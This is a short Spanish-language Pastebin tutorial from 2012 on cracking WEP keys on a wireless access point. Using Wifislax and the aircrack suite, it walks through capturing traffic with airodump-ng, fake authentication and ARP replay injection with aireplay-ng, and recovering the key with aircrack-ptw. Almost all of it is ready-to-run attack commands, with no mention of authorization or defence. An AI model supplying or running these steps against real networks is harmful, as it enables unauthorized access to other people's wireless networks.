xerpi

Wep cracking tutorial

Feb 19th, 2012
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.75 KB | None | 0 0
  1. Recargar el driver desde el menu de Wifislax
  2.  
  3. Se necesita apuntar el BSSID, ESSID y canal del AP, ya que se requeriran despues
  4.  
  5. Código:
  6. airodump-ng rausb0
  7.  
  8. Una vez aparezcan los datos, pulsamos CTRL+C (para parar el proceso)
  9.  
  10. Código:
  11. airodump-ng -c CANAL DEL AP -w DATOS rausb0
  12.  
  13. Código:
  14. ifconfig
  15.  
  16. Cogemos la MAC de tu tarjeta. Los 12 primeros numeros de HWaddr cambiamos los " - " por " : " (guiones por dos puntos)
  17.  
  18. Ejemplo: 12-58-47-FD-AD-8F-00-00-00-00 se cambia por 12:58:47:FD:AD:8F
  19.  
  20. Código:
  21. aireplay-ng -1 0 -a BSSID -h tu MAC -e ESSID rausb0
  22.  
  23. También podeis poner
  24.  
  25. Código:
  26. aireplay-ng -1 10 -a BSSID -h tu MAC -e ESSID rausb0
  27.  
  28. de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.
  29.  
  30. Una vez autentificados :) abrimos otra consola y ponemos
  31.  
  32. Código:
  33. aireplay-ng -3 -b BSSID -h tu MAC rausb0
  34.  
  35. Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.
  36.  
  37. Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
  38.  
  39. Código:
  40. aireplay-ng -1 0 -a BSSID -h tu MAC -e ESSID rausb0
  41.  
  42. Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.
  43.  
  44. Si no autentifica fijaros que el RXQ (airodump-ng) se mantenga por encima del 50% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encuentra demasiado lejos.
  45.  
  46. Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra consola.
  47.  
  48.  
  49. Código:
  50. aircrack-ptw DATOS-01.cap
  51.  
  52. No es necesario parar los procesos para buscar la clave, puede seguir subiendo DATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por ejemplo con 150.000 DATA
  53.  
  54. Al cabo de un rato (un minuto como máximo) os saldrá KEY FOUND con la clave wep.
Add Comment
Please, Sign In to add comment